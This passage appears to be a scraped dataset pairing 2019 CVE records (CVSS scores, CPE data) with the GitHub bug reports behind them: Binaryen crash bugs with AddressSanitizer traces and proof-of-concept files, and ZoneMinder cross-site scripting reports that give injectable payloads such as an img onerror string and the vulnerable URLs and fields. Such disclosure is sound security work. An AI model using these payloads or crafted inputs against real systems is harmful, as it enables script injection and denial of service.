#4 0x9112ce in std::_Rb_tree<wasm::Name, std::pair<wasm::Name const, wasm::Function*>, std::_Select1st<std::pair<wasm::Name const, wasm::Function*> >, std::less<wasm::Name>, std::allocator<std::pair<wasm::Name const, wasm::Function*> > >::find(wasm::Name const&) /usr/lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/stl_tree.h:2523
#5 0x9112ce in std::map<wasm::Name, wasm::Function*, std::less<wasm::Name>, std::allocator<std::pair<wasm::Name const, wasm::Function*> > >::find(wasm::Name const&) /usr/lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/stl_map.h:1164
#6 0x9112ce in wasm::Module::getFunctionOrNull(wasm::Name) /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm.cpp:797
#7 0xb8dc27 in wasm::validateExports(wasm::Module&, wasm::ValidationInfo&) /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-validator.cpp:1209:32
#8 0xb8dc27 in wasm::WasmValidator::validate(wasm::Module&, wasm::FeatureSet, unsigned int) /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-validator.cpp:1298
#9 0x627aba in main /home/wencheng/Documents/FuzzingObject/binaryen/src/tools/wasm-opt.cpp:158:28
#10 0x7f6ec277982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#11 0x51c5b8 in _start (/home/wencheng/Documents/FuzzingObject/binaryen/build/bin/wasm-opt+0x51c5b8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/wencheng/Documents/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:414 in __interceptor_strcmp.part.253
==9622==ABORTING
``` | Null pointer Deference in wasm::Module::getFunctionOrNull(wasm::Name) | https://api.github.com/repos/WebAssembly/binaryen/issues/1881/comments | 1 | 2019-01-20T12:11:54Z | 2019-01-20T18:08:15Z | https://github.com/WebAssembly/binaryen/issues/1881 | 401,091,528 | 1,881 |
CVE-2019-7152 | 2019-01-29T00:29:00.563 | A heap-based buffer over-read was discovered in wasm::WasmBinaryBuilder::processFunctions() in wasm/wasm-binary.cpp (when calling wasm::WasmBinaryBuilder::getFunctionIndexName) in Binaryen 1.38.22. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm-opt. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/binaryen/issues/1880"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078",
"versionEndExcluding": "65",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/WebAssembly/binaryen/issues/1880 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"WebAssembly",
"binaryen"
] | Hi, there.
A Heap-buffer-overflow problem was discovered in WasmBinaryBuilder::getFunctionIndexName(unsigned int). A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too.
Here are the POC files. Please use "./wasm-opt $POC" to reproduce the error.
[POC.zip](https://github.com/WebAssembly/binaryen/files/2776549/POC.zip)
git log:
```
commit 0e5e55053c171b138a0cf5aa8a08de8c7714048f
Author: Alon Zakai <[email protected]>
Date: Sat Jan 19 05:30:43 2019 -0800
Show a proper error on an invalid type in binary reading ; fixes #1872 (#1874)
```
The ASAN dumps the stack trace as follows:
```
=================================================================
==26011==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6060000032a0 at pc 0x0000009ae654 bp 0x7ffd831fce90 sp 0x7ffd831fce88
READ of size 8 at 0x6060000032a0 thread T0
#0 0x9ae653 in wasm::WasmBinaryBuilder::getFunctionIndexName(unsigned int) /usr/lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/unique_ptr.h:147:42
#1 0x9ae653 in wasm::WasmBinaryBuilder::processFunctions() /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-binary.cpp:1508
#2 0x980f41 in wasm::WasmBinaryBuilder::read() /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-binary.cpp:706:3
#3 0xa81ed9 in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-io.cpp:52:10
#4 0xa84b1c in wasm::ModuleReader::read(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-io.cpp:71:5
#5 0x627919 in main /home/wencheng/Documents/FuzzingObject/binaryen/src/tools/wasm-opt.cpp:144:14
#6 0x7ff28f63182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#7 0x51c5b8 in _start (/home/wencheng/Documents/FuzzingObject/binaryen/build/bin/wasm-opt+0x51c5b8)
Address 0x6060000032a0 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/unique_ptr.h:147:42 in wasm::WasmBinaryBuilder::getFunctionIndexName(unsigned int)
Shadow bytes around the buggy address:
0x0c0c7fff8600: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
0x0c0c7fff8610: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c0c7fff8620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c0c7fff8650: fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff86a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26011==ABORTING
```
| A Heap-buffer-overflow problem was discovered in WasmBinaryBuilder::getFunctionIndexName(unsigned int) | https://api.github.com/repos/WebAssembly/binaryen/issues/1880/comments | 1 | 2019-01-20T12:07:15Z | 2019-01-20T18:05:01Z | https://github.com/WebAssembly/binaryen/issues/1880 | 401,091,205 | 1,880 |
CVE-2019-7153 | 2019-01-29T00:29:00.597 | A NULL pointer dereference was discovered in wasm::WasmBinaryBuilder::processFunctions() in wasm/wasm-binary.cpp (when calling wasm::WasmBinaryBuilder::getFunctionIndexName) in Binaryen 1.38.22. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm-opt. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/binaryen/issues/1879"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078",
"versionEndExcluding": "65",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/WebAssembly/binaryen/issues/1879 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"WebAssembly",
"binaryen"
] | Hi, there.
A Null pointer Deference problem was discovered in WasmBinaryBuilder::getFunctionIndexName(unsigned int) in wasm/wasm-binary.cpp. A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too.
Here are the POC files. Please use "wasm-opt $POC" to reproduce the problem.
[POC.zip](https://github.com/WebAssembly/binaryen/files/2776540/POC.zip)
git log
```
commit 0e5e55053c171b138a0cf5aa8a08de8c7714048f
Author: Alon Zakai <[email protected]>
Date: Sat Jan 19 05:30:43 2019 -0800
Show a proper error on an invalid type in binary reading ; fixes #1872 (#1874)
```
The ASAN dumps the stack trace as follows:
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==14886==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000009ace8e bp 0x7ffccfd53b70 sp 0x7ffccfd539a0 T0)
==14886==The signal is caused by a READ memory access.
==14886==Hint: address points to the zero page.
#0 0x9ace8d in wasm::WasmBinaryBuilder::getFunctionIndexName(unsigned int) /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-binary.cpp:970:10
#1 0x9ace8d in wasm::WasmBinaryBuilder::processFunctions() /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-binary.cpp:1508
#2 0x980f41 in wasm::WasmBinaryBuilder::read() /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-binary.cpp:706:3
#3 0xa81ed9 in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-io.cpp:52:10
#4 0xa84b1c in wasm::ModuleReader::read(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-io.cpp:71:5
#5 0x627919 in main /home/wencheng/Documents/FuzzingObject/binaryen/src/tools/wasm-opt.cpp:144:14
#6 0x7fac33df582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#7 0x51c5b8 in _start (/home/wencheng/Documents/FuzzingObject/binaryen/build/bin/wasm-opt+0x51c5b8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/wencheng/Documents/FuzzingObject/binaryen/src/wasm/wasm-binary.cpp:970:10 in wasm::WasmBinaryBuilder::getFunctionIndexName(unsigned int)
==14886==ABORTING
``` | Null pointer Deference in WasmBinaryBuilder::getFunctionIndexName(unsigned int) in wasm/wasm-binary.cpp | https://api.github.com/repos/WebAssembly/binaryen/issues/1879/comments | 2 | 2019-01-20T12:02:25Z | 2019-01-24T18:05:45Z | https://github.com/WebAssembly/binaryen/issues/1879 | 401,090,832 | 1,879 |
CVE-2019-7154 | 2019-01-29T00:29:00.627 | The main function in tools/wasm2js.cpp in Binaryen 1.38.22 has a heap-based buffer overflow because Emscripten is misused, triggering an error in cashew::JSPrinter::printAst() in emscripten-optimizer/simple_ast.h. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm2js. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/binaryen/issues/1876"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078",
"versionEndExcluding": "65",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/WebAssembly/binaryen/issues/1876 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"WebAssembly",
"binaryen"
] | Hi, there.
A Heap-buffer-overflow problem was discovered in cashew::JSPrinter::printAst() function in simple_ast.h in emscripten-optimizer, as distributed in Binaryen 1.38.22. A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too.
Here are the POC files. Please use "./wasm2js $POC" to reproduce the error.
[POC.zip](https://github.com/WebAssembly/binaryen/files/2775321/POC.zip)
git log:
```
commit 777d33d40ff030f1711c40bf3cd5bc4bc36af313
Author: Alon Zakai <[email protected]>
Date: Wed Jan 16 13:22:39 2019 -0800
Emscripten stack simplification (#1870)
This takes advantage of the recent memory simplification in emscripten, where JS static allocation is done at compile time. That means we know the stack's initial location at compile time, and can apply it. This is the binaryen side of that:
* asm2wasm support for asm.js globals with an initial value var X = Y; where Y is not 0 (which is what the stack now is).
* wasm-emscripten-finalize support for a flag --initial-stack-pointer=X, and remove the old code to import the stack's initial location.
```
The ASAN dumps the stack trace as follows:
```
=================================================================
==13429==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d0000009ac at pc 0x000000654a5f bp 0x7ffc53b185d0 sp 0x7ffc53b185c8
WRITE of size 1 at 0x61d0000009ac thread T0
#0 0x654a5e in cashew::JSPrinter::printAst() /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:564:18
#1 0x654a5e in main /home/wencheng/Documents/FuzzingObject/binaryen/src/tools/wasm2js.cpp:119
#2 0x7f284ecc582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#3 0x5116f8 in _start (/home/wencheng/Documents/FuzzingObject/binaryen/build/bin/wasm2js+0x5116f8)
0x61d0000009ac is located 0 bytes to the right of 2348-byte region [0x61d000000080,0x61d0000009ac)
allocated by thread T0 here:
#0 0x5d1aa0 in realloc /home/wencheng/Documents/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:107
#1 0x701b53 in cashew::JSPrinter::ensure(int) /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:581:26
#2 0x6ff826 in cashew::JSPrinter::print(cashew::Ref) /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:645:5
#3 0x718964 in cashew::JSPrinter::printVar(cashew::Ref) /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:1195:9
#4 0x6fff70 in cashew::JSPrinter::print(cashew::Ref) /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:734:26
#5 0x71db30 in cashew::JSPrinter::printStats(cashew::Ref) /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:764:9
#6 0x709a15 in cashew::JSPrinter::printDefun(cashew::Ref) /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:810:5
#7 0x700ea3 in cashew::JSPrinter::print(cashew::Ref) /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:684:28
#8 0x71db30 in cashew::JSPrinter::printStats(cashew::Ref) /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:764:9
#9 0x700e2e in cashew::JSPrinter::printToplevel(cashew::Ref) /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:774:7
#10 0x700e2e in cashew::JSPrinter::print(cashew::Ref) /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:723
#11 0x65363f in cashew::JSPrinter::printAst() /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:563:5
#12 0x65363f in main /home/wencheng/Documents/FuzzingObject/binaryen/src/tools/wasm2js.cpp:119
#13 0x7f284ecc582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/wencheng/Documents/FuzzingObject/binaryen/src/emscripten-optimizer/simple_ast.h:564:18 in cashew::JSPrinter::printAst()
Shadow bytes around the buggy address:
0x0c3a7fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fff8120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3a7fff8130: 00 00 00 00 00[04]fa fa fa fa fa fa fa fa fa fa
0x0c3a7fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==13429==ABORTING
```
| A Heap-buffer-overflow problem was discovered in cashew::JSPrinter::printAst() function in simple_ast.h | https://api.github.com/repos/WebAssembly/binaryen/issues/1876/comments | 0 | 2019-01-19T07:42:40Z | 2019-01-23T01:15:38Z | https://github.com/WebAssembly/binaryen/issues/1876 | 400,971,559 | 1,876 |
CVE-2019-7325 | 2019-02-04T19:29:00.383 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, as multiple views under web/skins/classic/views insecurely utilize $_REQUEST['PHP_SELF'], without applying any proper filtration. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2450"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2450 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
There exists XSS in multiple views as it insecurely utilizes `$_REQUEST['PHP_SELF']`, that is without applying any proper filtration
All the view files available under /web/skins/classic/views/ are vulnerable, expect few listed below.
/web/skins/classic/views/blank.php
/web/skins/classic/views/error.php
/web/skins/classic/views/event.php
/web/skins/classic/views/events.php
/web/skins/classic/views/image-ffmpeg.php
/web/skins/classic/views/_monitor_filters.php
/web/skins/classic/views/_monitor_source_nvsocket.php
/web/skins/classic/views/optionhelp.php
/web/skins/classic/views/plugin.php
/web/skins/classic/views/postlogin.php
/web/skins/classic/views/status.php
/web/skins/classic/views/timeline.php
/web/skins/classic/views/version.php
/web/skins/classic/views/watch.php
**To Reproduce**
Affected URL :
http://localhost/zm/index.php/${injectionpoint}$?view=ANYVIEWNAME
Payload used - `</script>"><img src=x onerror-prompt('1');>`
- Navigate to the Affected URL, Payload would be triggered.
<img width="487" alt="php_self" src="https://user-images.githubusercontent.com/47003572/51703531-93b8d000-203c-11e9-9bb6-97cfb33c70af.png">
**Expected behavior**
- Proper escaping of special characters.
**Debug Logs**
```
None
``` | Reflected Site Scripting(XSS) - Multiple ($_SERVER['PHP_SELF']) (1) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2450/comments | 0 | 2019-01-24T19:31:01Z | 2019-02-10T06:12:59Z | https://github.com/ZoneMinder/zoneminder/issues/2450 | 402,861,864 | 2,450 |
CVE-2019-7326 | 2019-02-04T19:29:00.430 | Self - Stored Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'Host' parameter value in the view console (console.php) because proper filtration is omitted. This relates to the index.php?view=monitor Host Name field. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2452"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2452 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `console`, insecurely prints the `Host` value on the webpage, without applying any proper filtration, leading to Self - stored XSS.
**To Reproduce**
Affected URL :
http://localhost/zm/index.php?view=console
Payload used - `"><img src=x onerror=prompt('1');>`
- Navigate to the http://localhost/zm/index.php?view=monitor&mid=1&tab=source
- Inject the XSS payload into the `Host Name` field.
- Navigate to the affected URL, payload will be triggered
<img width="521" alt="console" src="https://user-images.githubusercontent.com/47003572/51704205-7422a700-203e-11e9-919d-f98f01e1cfa5.png">
**Expected behavior**
- Proper escaping of special characters.
**Debug Logs**
```
None
``` | Self - Stored Cross Site Scripting (XSS) - console.php | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2452/comments | 0 | 2019-01-24T19:44:53Z | 2019-02-09T10:30:32Z | https://github.com/ZoneMinder/zoneminder/issues/2452 | 402,866,805 | 2,452 |
CVE-2019-7327 | 2019-02-04T19:29:00.477 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'scale' parameter value in the view frame (frame.php) because proper filtration is omitted. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
